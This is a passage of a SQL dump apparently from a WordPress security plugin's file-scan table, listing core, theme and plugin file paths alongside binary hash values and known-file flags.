��6','',0,'?'),('&�;%�8I�R/+��\n`.','wp-includes/wp-includes/js/tinymce/skins/wordpress/images/audio.png',0,'7~!���\0����\"w','7~!���\0����\"w','�g��z���.g�V�:��[����Й�H)Ȟ�','',0,'?'),('&���Rw?~�j�hJ�D','wp-includes/Text/Diff/Renderer/inline.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\n�n5�P�����B\'�','X�U.k�@-(��5�N�����V','',0,'?'),('&��]0W��\n)�=��','wp-includes/js/tinymce/plugins/directionality/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Er�HD��D��3��@','<����o�@�:����-�Eg���)6^Ѽ\'��','',0,'?'),('&�6���\\����j,�','wp-content/themes/fastblog/js/functions.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�� ��(�6U�Q','��m�d]�s̋ݣ�1�\Z�Ɲ���8$��R���','',0,'?'),('&ľ�=�@zy�v�T~','wp-includes/wp-includes/js/dist/deprecated.min.js',0,'T�\\O���d�#��s�u','T�\\O���d�#��s�u','�`<�`qn�̀��\"�`�*���t�����y�','',0,'?'),('&�`�O�Q5�Q�43�','wp-admin/theme-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�\"��}<м�鵴','$��Sl����\Z���P5��z7���H�','',0,'?'),('&��� P�shcusS','wp-content/wflogs/attack-data.php',0,'#ح\n���y�Ib�\r�\r','#ح\n���y�Ib�\r�\r','l��4Eq�{���������\'wg�31�c�w:�','',0,'?'),('&�vA��Q��c��qw8,','wp-includes/theme-compat/header-embed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Omz8��F����','�����})d!q ,@,��j��v ����E���','',0,'?'),('&��!v���\'&�Ji','wp-includes/wp-includes/customize/class-wp-customize-nav-menu-section.php',0,'��ԡ�P�\n}�$','��ԡ�P�\n}�$','�vG~?t7\0��h�R,��|�]9��p�.J�w','',0,'?'),('&Ҝ��T�_Wճ���1A','wp-content/themes/advance/inc/kirki/assets/images/kirki-bottom.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x*QX�WTe���8�','�cA(Ϲ��0��\ZQ\n/���B�9��B���c','',0,'?'),('&�`���{\Z$�N�F��`','wp-content/themes/storeone/sidebar-shop.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��b-D?�9�4��g 2~','KIkU����P���\r� y�\\��A�� �','',0,'?'),('&��1}GX%��\0�N','wp-content/themes/promote/images/sep-shadow.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&�0Qһ��:4,��','~4�\\-��;1ĩ\0�)A��H㗽dp\\�','',0,'?'),('&饱����W���|�','wp-includes/widgets/class-wp-widget-links.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x�/k�h\n��ֽ[Nv ','�쇉���,�x���-��DO�,��7ш�Q�','',0,'?'),('&�Y���z�q�[F�f@�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/WebService/Client.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ⶨ�;*���?��z�','���:O.�\'�~y��@�Y`FMN�:�n�.�;q@','',0,'?'),('&���PV�w��Ss','wp-content/plugins/wp-cerber/cerber-2fa.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\nqd��Ը��}��','��\Z�����h��=RG��0��%̪��� �Mm6','',0,'?'),('&�aUG���κG��','wp-content/themes/twentytwentyone/assets/sass/05-blocks/quote/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���!!o=b��i','k�����{��G9��W1h��`���sҗ�D`�M�','',0,'?'),('\'�ە}+V\r`R��`j','wp-includes/wp-includes/blocks/latest-posts.php',0,'�i{�$F�ČPի!','�i{�$F�ČPի!','\Z:����F��s�K�����\\��W����\r��','',0,'?'),('\' �\rNo�O���','wp-content/themes/newsmag/inc/admin/welcome-screen/sections/changelog.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'-m�,��k�9�~G0','�R@/~�Z�v��G��&z���K��U��','',0,'?'),('\'=!Za��a���jU�Q','wp-admin/css/site-icon.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���}�E���p0lu','i>Ӻ#�&�2Z�\'��K(*�����','',0,'?'),('\'>��C͍z9!F\Z��','wp-includes/wp-includes/js/jquery/ui/effect-transfer.min.js',0,'�&��H������*��l�','�&��H������*��l�','%��({cI�}��,�Ѧ�)��1`WɆ','',0,'?'),('\'Ac���, ~�6�ܦ�','wp-content/plugins/wordfence/views/onboarding/tour-overlay.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:��%� �);�\0','\Z��\'ġ맪���.s\'��sd�4�^��I','',0,'?'),('\'I+��zzY�m}��L','wp-content/themes/weblog/assets/library/owl-carousel/owl.carousel.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��lb�[�D(.��B�bY','^S����B�ŅZ�C8�\\s�P��c7M��[\n','',0,'?'),('\'M��w����\rKj','wp-admin/includes/class-wp-site-icon.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W~��0�d���y�','_9��%7�N�[\"��m�;Xi:RG�x^�q]','',0,'?'),('\'g���w�Q����','wp-includes/wp-includes/js/media-grid.js',0,'BN5�d��b�i^&ޖn','BN5�d��b�i^&ޖn','��$�#�& v��PS�u{Z�)XÜ����ֱ�','',0,'?'),('\'q�� ��e�����c','wp-content/plugins/wp-cerber/assets/tpicker/jquery.timepicker.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��oD�Z3���nR��w','�c�4r)|��V��_kZ�n��:\"���Q%��','',0,'?'),('\'y�m���]����','wp-includes/wp-includes/feed-rss.php',0,'iJ�?YC�>^��f�','iJ�?YC�>^��f�','�fl�P��f5�2tY3�x���D��ׄ�','',0,'?'),('\'��o�92[g!F��\"�','wp-content/themes/promote/inc/kirki/includes/controls/class-kirki-controls-preset-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>GF2n�6�l`�;Q�\'�',';I�{cj�Q!�B�ٸ�;�?4E0�����}ּ)','',0,'?'),('\'���� �o���S��','wp-content/plugins/wordfence/images/icons/ajax3.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mw�ߴtꍓ\'\n���s','�dz��\n�yK�Ʈ��\'#]�x VJR��.=:','',0,'?'),('\'��9 \Zid��E�<��~','wp-includes/wp-includes/default-widgets.php',0,'0�t��<���!�','0�t��<���!�','�^�\'U9�;dOˊSz��!S��m��>I5�\'�e�','',0,'?'),('\'�\"z��n��p��aE','wp-content/plugins/akismet/views/enter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�EG�T��A>�sJ','F���R�<`�=#i�z�Ag�Dd)��q','',0,'?'),('\'��I�f`!Z���{�','wp-content/themes/storeone/template-parts/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O\'K�ng7�\"oM|��',':�\n�+� �����D c�4G���MP�j�����','',0,'?'),('\'�s�kV~�#���X','wp-content/themes/advance/inc/kirki/assets/js/controls/typography.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N���� c[/��/n','�����z��4Y����L\Ze�^�@�(��','',0,'?'),('\'���q#�]#X��q','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-repeater-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��F�6�!�z��R','>߃$3���*��>$ֻ-t�����,���','',0,'?'),('\'�g|\"���jݹ2�','wp-includes/js/jquery/ui/effect-transfer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','OԩN��i���1','Ł\0p�,�\\�!ON)�Q���Xl ��k�s�l�','',0,'?'),('\'�Z?��X��W�<�','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a͐��\r����','u�^K���\n���ih��C�d.i�H�-��j�l�','',0,'?'),('\'������y0V�Z\\','wp-includes/wp-includes/Requests/Cookie/Jar.php',0,'�0_��&p��\"4�\\�','�0_��&p��\"4�\\�','c��!�#B�i*+\"�\r�n���Iƈ�XÉ��w�','',0,'?'),('\'����t\\JZ�Ah�','wp-content/plugins/wp-cerber/assets/flags/se.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5r5�E&a��_�&� ','Wh�LP!����#O�QkJ�Nj�9u`$�c��','',0,'?'),('\'ڨ�oκdm=�ù�9','wp-includes/wp-includes/js/tinymce/plugins/compat3x/plugin.min.js',0,'L�{��p��Ҡ','L�{��p��Ҡ','��m�澑�[�S3��\'�J�*��Sts�j���','',0,'?'),('\'���_iYm1��R','wp-content/plugins/wordfence/views/scanner/scan-results.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r��Z�}giؑz2*P','��wu�p -���D����<z�w榀UD4�Ԥ','',0,'?'),('\'�0�o�Lx�����','wp-includes/wp-includes/js/dist/block-directory.min.js',0,'�*U���ܰ��(���','�*U���ܰ��(���','��5�~�Y*�2M���3zf�f%���w�L�qՇ�','',0,'?'),('\'�E��w�D9�>��8','wp-includes/wp-includes/sodium_compat/src/Core32/Ed25519.php',0,'(��|v�}�9S�9S','(��|v�}�9S�9S','\n,,Y�B��:�En������4�f\r�,��Zbq','',0,'?'),('\'��=�-���AC\\K','wp-content/themes/twentytwentyone/assets/sass/07-utilities/color-palette.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e�s�Aq��tf>�\Z9','k�:����4�j�(��$����緪��c���','',0,'?'),('\'��̬L�Nќ��I�R','wp-includes/wp-includes/js/tinymce/plugins/tabfocus/plugin.min.js',0,'�!�<�]��r�','�!�<�]��r�','���p[�����L7F��|˖ZB�R�','',0,'?'),('\'�,��r\n\n\r\Z�3�','wp-content/plugins/wp-cerber/assets/flags/mc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3\"0\r�2O�>�=D1�\0','�0�0V�>�K[�5_��R~�dy�� \ns��S��','',0,'?'),('(��g%\0��4��l>��','wp-includes/js/jquery/jquery.schedule.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&��T�k�f؞���','��?��vEʔ��wj���C�P՝��_��','',0,'?'),('(6�R�Őe����+G','wp-content/themes/travel-stories/images/strelka_right_light.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Rєj����4���I','��0��FSP-L��C�qA�@ƕ��{�e���','',0,'?'),('(=m\r�\'�2�)���ä','wp-content/themes/advance/inc/kirki/assets/images/3cr.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ٱ�!+S����i?','�&�P��tAez��s��j�ۤݥAd}��ʄ','',0,'?'),('(?���>��S�N揚�&','wp-includes/images/media/default.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-����I�B�h�@���b',':�oL�JDj�$->�i��\'�6n֠��Ui','',0,'?'),('(M()8.閧Zֈj��','wp-includes/wp-includes/Requests/Proxy.php',0,'�@k7�\0��t�\\*��G','�@k7�\0��t�\\*��G','�w<PB��ZC�k�SI�Q!��\n}i','',0,'?'),('(WQ=3��y��b6','wp-includes/cache-compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?�Iq_��P�$ӄ','���]4\'��9���w�E��J�J�\r�nh�','',0,'?'),('([d��������BQ��','wp-admin/js/updates.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K��5�yP��Õ�{','��NI7`&\'�8�Zt���U�-��*��n�/Y','',0,'?'),('(h\"\n�-B��� Wd6','wp-includes/wp-includes/js/mediaelement/wp-mediaelement.min.js',0,',m;V*H��Tt���~X�',',m;V*H��Tt���~X�','��a�ԋRY哝���a����<�n[G{=y3�? ','',0,'?'),('(s�D��+��|���<u','wp-includes/wp-includes/SimplePie/Parse/Date.php',0,'N\\�O2�����C[\nջ','N\\�O2�����C[\nջ','�=��<��ei|�M�qZ]V[]&I-q9)g�0','',0,'?'),('(x*J���,�LÛn�<K','wp-content/plugins/wordfence/images/icons/arrow_refresh.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k�w�`�`�|�}$G��','u�/2/����@�H�_Ilh����/�aU:� ','',0,'?'),('(~6vqV�0�{�\"','wp-includes/ID3/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ݣ��z�eѧѥk58�','l��r����p4��FBܢ7\"Z:�W�v���','',0,'?'),('(���v|T�— ¥�','wp-admin/includes/screen.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ɬV\Z j���A��|�','~Ky�i�2j*SgT<�q{�aa�%���;���;�','',0,'?'),('(���y\0 �pDO�`','wp-content/themes/twentynineteen/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*����\0���a��6R','��:�g����~{l���E�8��1XT`CYH','',0,'?'),('(��C\n֊��bAk6FS','wp-content/plugins/wp-cerber/assets/sh/scripts/shCore.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H���l7�B����20O','%{��*ZO5��D�\n�¦+�1T�c���#`','',0,'?'),('(�Y�\'��^kz!q����','wp-includes/js/dist/block-directory.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\' �}� ����i�w&','0$����p\Z�c��5�mJ����^�y\"C','',0,'?'),('(�\\�C�*o)���','wp-includes/wp-includes/js/dist/blocks.js',0,' */ĭ�b��@m�0',' */ĭ�b��@m�0','����˴kSh�4���!�3:�Tæ�~DM','',0,'?'),('(�� `���o�f1�','wp-content/themes/newsmag/inc/admin/welcome-screen/sections/getting-started.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j]�f\rB��ʻ{k','�7M�����J��Y�Q�W=����,�','',0,'?'),('(����\"����E=�','wp-includes/wp-includes/js/jquery/ui/button.min.js',0,'�k{�qz�uo�>���','�k{�qz�uo�>���','8�v�J.�OA�z��A)�HJe�f�B�,��z','',0,'?'),('(��Օ�)�(pwBl','wp-includes/js/dist/list-reusable-blocks.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?�+Gq#�]��`6�! ',')A�Ta9��9e\Z�?#�?�b�����n��]���','',0,'?'),('(�|�Z�x�T���[�u','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Base64/Original.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z?��(��E�Wup�','�+���D�\0ej�\rg���ϧ��4�','',0,'?'),('(��� R�w���?}','wp-includes/wp-includes/class-wp-role.php',0,'��yH���,o�:���','��yH���,o�:���','\'}ؑ9��X8u���ߨ�[(o�a�n\\�','',0,'?'),('(���>f0\Zg[|���','wp-content/plugins/wordfence/lib/wfJWT.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}{ j�N���c�K�','0mhN`x�x~H�Lj�s����O��P��,','',0,'?'),('(¬��R\Z�[;��@�','wp-content/themes/maxbusiness/inc/jetpack.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����.�\r)����%�','j�켑Xڅ��_bs}t\nc���#6��o�','',0,'?'),('(����M�(�72���','wp-includes/wp-includes/js/mediaelement/mediaelement-migrate.js',0,'<�C�_hz�3��<7','<�C�_hz�3��<7',',b#0�!a�OVc,��ؕSԏI�л%��p)��','',0,'?'),('(�p��� �����','wp-includes/wp-includes/css/dist/nux/style-rtl.min.css',0,'\n����n��L�6\r�k','\n����n��L�6\r�k','Q9��1�9�ĵ��j1���g�9�\"*h+ۥ-n','',0,'?'),('(��LS[��Wl#���','wp-includes/sodium_compat/src/Core32/Int64.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%m�S�,���\\�','U���!�6��/�U�cq���n���@�+�','',0,'?'),('(�d���9n�+̦�','wp-includes/wp-includes/theme-compat/footer-embed.php',0,'��Z����.�+�j','��Z����.�+�j','�i��D�AJ�ψ;v,gc�%��� ^#','',0,'?'),('(�^�3N������3','wp-includes/wp-diff.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ��-x�<�z^�Wet','�a��;�ɺ��*2Z��f1��\"�\n�Nt~�>��','',0,'?'),('(�,���ג8�ʺv�','wp-includes/wp-includes/Text/Diff/Renderer/inline.php',0,'�\n�n5�P�����B\'�','�\n�n5�P�����B\'�','X�U.k�@-(��5�N�����V','',0,'?'),('(�=��,��*F\n�^Jv','wp-content/plugins/wp-cerber/assets/flags/eh.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<���n���7W6^\Z','��I�auK�+��<?�`]�n]�m|�P�ّS','',0,'?'),(')�Po��63�I�k','wp-content/themes/Yegor/FT/js/jquery.minicolors.min.js',0,'\n�-�0��IBg���~','\n�-�0��IBg���~','+�K*�>����^�ƕۏ�f�W�F\rq#��x�','',0,'?'),(')���|�{4�+]�X(','wp-includes/Requests/Exception/HTTP/411.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�R��M�.�Z`G�','���U�^����9p��&���`�nM{� n�L','',0,'?'),(')*�}W\\#_�Ep���c','wp-content/themes/spidermag/assets/library/animate/js/wow.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?�*�gjQwЩ�R�','>95��҂���@�S!�Z�1�,��A','',0,'?'),(')8\\�#����\\~�$�y','wp-content/themes/fastblog/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9���tmgZ�i#��','��Jp�P\n����>�I�9�3@G�d�N�0��','',0,'?'),(')SB&�Fy�/N���]8\Z','wp-includes/wp-includes/sodium_compat/src/Core/Poly1305.php',0,'!�i��L�V=X+� v0~','!�i��L�V=X+� v0~','4��-<4�,\"V�ȱXʘî�hR� K�F�k�','',0,'?'),(')b���*nA��~�','wp-includes/wp-includes/js/plupload/wp-plupload.min.js',0,'����Z�:�x��r�','����Z�:�x��r�','�LK��3)�5����\0r�q]�l���>��1�','',0,'?'),('){�jW-_�Q=?�GlҢ','wp-includes/media.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D��|��ߟa]IW�S�J','R�y��n�lq��侅��.�$�����%','',0,'?'),(')��;�N����oFZ','wp-content/themes/fastblog/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' \r�$�:���_�\r�','va������K�]�2�GϢ!�˦��]�a+�','',0,'?'),(')�*��S�k�QK2,','wp-includes/wp-includes/js/wp-sanitize.min.js',0,'i�f05��}$��]���','i�f05��}$��]���','�Ea5/qJ�Xo+#x��[�X86)3�ن>��','',0,'?'),(')��H7�N�Jbv�/�','wp-includes/wp-includes/images/media/text.png',0,'z��s��0�ȝ�Q�K','z��s��0�ȝ�Q�K','�g��?[��D*�p�8�q���Vѓ�>��N','',0,'?'),(')� p{��C�*���','wp-content/themes/promote/inc/kirki/assets/js/controls/spacing.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b\n�r�C��\0g','�lK��VE*�\"Ls�G�=��:/��>�D�ġ','',0,'?'),(')�Oz=�u����˷','wp-includes/rewrite.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7\0B6\"���7��X�','�\n����בu��������5$E��i�4I�d','',0,'?'),(')Ő�1�H$�`��','wp-includes/wp-includes/images/toggle-arrow.png',0,'��·�a��;�d��*�','��·�a��;�d��*�','[b\Z���;�]�f�0���s|:�����%','',0,'?'),(')̃�2�k�h���! ','wp-content/plugins/akismet/akismet.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h�͢<�5����Q�','$}�\\��g��\0e�:�n�f�E}ۜ\r��I ','',0,'?'),(')���Z���#q��','wp-content/themes/kidzoo-lite/template-parts/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���m���%��[\']z','�-ō�Q��ͨS\".M$[J\"P�@\0Vpll6','',0,'?'),(')�6#�_��̟SAF�','wp-content/plugins/wordfence/views/scanner/issue-control-repair.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a!�[)T.�nk=ݗ��','�tl���J%�0wdE��\"�4.t�kL��9�1��','',0,'?'),(')��]���Z$�P%','wp-includes/embed-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��U�z�A>z�\'!f*','*xJ���\"�t��\r^K$U�09���Z�иC�ru','',0,'?'),(')�I�\nΆV���q��{','wp-admin/authorize-application.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��xO����$:��g-','M����J,�l��zEX�N>�����T��','',0,'?'),(')��唩er)\0ъc','wp-content/themes/pine/inc/customizer-controls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n�4S�jc@dtk�ǯn','����F]�v�>P��\\¿x��w���e>��\0q�','',0,'?'),(')�x���O�5��-','wp-includes/wp-includes/js/colorpicker.min.js',0,'��3+ h\"��C��k','��3+ h\"��C��k','�0O����ކ�������=u)��g8b/�','',0,'?'),(')�`��f,��u�4��','wp-admin/includes/class-wp-privacy-data-removal-requests-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�X� D2%l#b/�W','ջ�R�\0���\0�����i�H//���w��\0�','',0,'?'),('* a�F���4��u�vU','wp-admin/images/menu-vs-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�ZY<�i�Y��b�','\'��F�єE\0����7�ɡ��#�>sePض','',0,'?'),('*3G����ү�$�I','wp-content/plugins/wp-cerber/cerber-load.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������u1��; !ɥ�','|���\Z^}=ρ�>�m̎7i���A���@�C&','',0,'?'),('*@�Ky_��s{m�L�p','wp-content/themes/promote/inc/kirki/includes/field/class-kirki-field-select2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[�>i�1L1��q�E4*','u\0yUM���ɪ���vU�Y`�I�A5xa�vN@','',0,'?'),('*D���4w����m�Z','wp-content/themes/advance/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[R��n;�|S]�W�7�','�\'�u7�KQ��`w��\n�=��5��Pfe���I','',0,'?'),('*L��><1�ŭ��{q.','wp-content/themes/hueman/assets/czr/css/img/czr-spinner.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rok����h�PWMܕ�C','�1�{�K��oQ3�$�iJ���~L]u�D��ϙ','',0,'?'),('*O�z��!�.��aav�','wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-block-renderer-controller.php',0,'eo1Ǡ܇4RA����','eo1Ǡ܇4RA����','�{b3P4ؚ�R�/��5y�\\d�Q�bzE�x','',0,'?'),('*V.XZ��_C[AԀ�C3','wp-includes/js/dist/keycodes.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ز��$l�6S��u��q','��Ӏ(r%�Ǟb�i�j�u@��>��Hr\ZF�]��','',0,'?'),('*\\Tҝ)%]�yiD+','wp-includes/Requests/Exception/HTTP/402.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`�Y�QP�\nz����G�','�g��NQ �������/��� �y5������θc','',0,'?'),('*g?]:m�1=E����;','wp-content/themes/maxbusiness/css/media-screen.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E[i�B�.JIF�y','�xr\\lsH{�\r0GY�lH>Q�ӣ�V�u�','',0,'?'),('*lK��qW�M\0| ��Y','wp-content/themes/twentytwenty/assets/images/2020-three-quarters-1.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-��a�.�t�]U��v�','n��\0��<VEկ�Rm�K�r72k�kSe�\'��#','',0,'?'),('*~��=�ƻ��r�','wp-content/themes/hueman/assets/front/img/demo/10-320x320.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"���(�W1\"��B9','��˹��5�i$^P��m-&�+�<�+,��s�','',0,'?'),('*��-3�u��E�[�O#','wp-includes/images/down_arrow-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]����M�����f�','��w\0����qp�q�5���T�#�\\����','',0,'?'),('*���h�KkL��\n�o�d','wp-content/themes/kidzoo-lite/css/error.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O1.�-� ����K�',' �|��ē��3�� �b��Z_�m�f��','',0,'?'),('*������b��*ee�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/HSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x\\8z�M�~�.��','�vR�\0�S~[�\r��Ү6��o���:Ś�\r]','',0,'?'),('*��L�m&&2��\nb','wp-includes/js/tinymce/utils/form_utils.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���l�U��T����Li','vL���us<*r�WҪ����.\0|�Rg����','',0,'?'),('*�`U�z�]\"L%�1��','wp-includes/sodium_compat/src/Core32/HSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/Dzx��ǂ��','���,�����E���{��0/m�a�X�i���','',0,'?'),('*�mB��vH\ne��','wp-content/themes/twentytwentyone/assets/sass/05-blocks/utilities/_font-sizes.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�����MiGx��V�s','i��Y4t��4|-�>1�]�f�)J����I�Z��l','',0,'?'),('*�&C:[���r�9�N�','wp-includes/sodium_compat/src/Core/Base64/Common.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P��ef���i�\'�jW','6���UmЖ�%��?�M�S�A^=�X��|U��','',0,'?'),('*�d����=�X�4�h','wp-content/themes/anima/includes/tgmpa.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�IO��l���K�=H','�F���\nK� ��ҔL��FbH.����r˰;','',0,'?'),('*�E�Ǭ�qQM���','wp-includes/wp-includes/js/jquery/jquery.table-hotkeys.min.js',0,'�o�go����~i�I �','�o�go����~i�I �','�<��=���;�:�t_,w�ăI���,�,��','',0,'?'),('*�\Z07ѥ1O���َ8','wp-includes/js/json2.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s��{N�|EO�0�','q3�..�j G\\R�nݼI/T��-�','',0,'?'),('*� �ą����\\�','wp-content/plugins/wordfence/views/options/option-toggled.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`GN��M��ti����','�r��_4\0��2��:䮰�!p1A��c_','',0,'?'),('*�B=�s��C�F�zh�r','wp-includes/wp-includes/js/mce-view.min.js',0,'����<��@^�P�\'','����<��@^�P�\'','#�� ��\\P�Wdqߋ��.��4Ó��x<�','',0,'?'),('*��6§\'�ӱ�yB��','wp-content/themes/showcase-lite/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�fB�C�>�`�OE>','��Ѭ�MH~���P��M�y���☎� �j.�','',0,'?'),('+.ݓ�/�)�I!�dyN','wp-content/themes/auberge/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d�6�[�����H','I�ԝ/Bm�!��HہHcB��\Z���]��W','',0,'?'),('+PXoV�h�S�)\r�','wp-includes/wp-includes/css/wp-auth-check.css',0,'�%��L��ԥ|l\"��','�%��L��ԥ|l\"��','�]��\"8y����;��=X\r����Y�$��T;','',0,'?'),('+&|1�� �w6�b��*','wp-content/plugins/wp-cerber/assets/flags/vu.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&�@�C.�J���#','��;����\0ě�k��=���G���W$��۳','',0,'?'),('+6Y���Ll�W���W�','wp-content/themes/promote/inc/kirki/includes/controls/class-kirki-controls-typography-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Lo�b�zzL�s�u+�','G`���H;}B��,�B=%�Tl�ab�}����','',0,'?'),('+9���[BU�E�e','wp-admin/js/updates.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r��Y��=��{��','�z#s�Tc o%*��l1�qܩ�d�I�G��','',0,'?'),('+N�m\n�=��-\0`�y','wp-includes/wp-includes/js/tinymce/plugins/wpemoji/plugin.js',0,'SE���x=d��~���eM','SE���x=d��~���eM','\"�w�%%{���=L(���hK�\rƢH�P','',0,'?'),('+b\n��Df�X2���Y�C','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/ConnectionType.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d���S:�-N�!Q�0\"','�6�)?��^\"F�*�g|��&��R�Π��\0 ','',0,'?'),('+lH�m�ӿn�Q���','wp-content/plugins/wp-cerber/assets/flags/ae.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��*� �X4^���','ظ�,&9uO�)S�ղ�?(2��ᖘ��Lq9�,�','',0,'?'),('+xVk��eg��4%��','wp-includes/wp-includes/sodium_compat/src/Core32/Poly1305/State.php',0,'��D�5��$ý\n �\'q0','��D�5��$ý\n 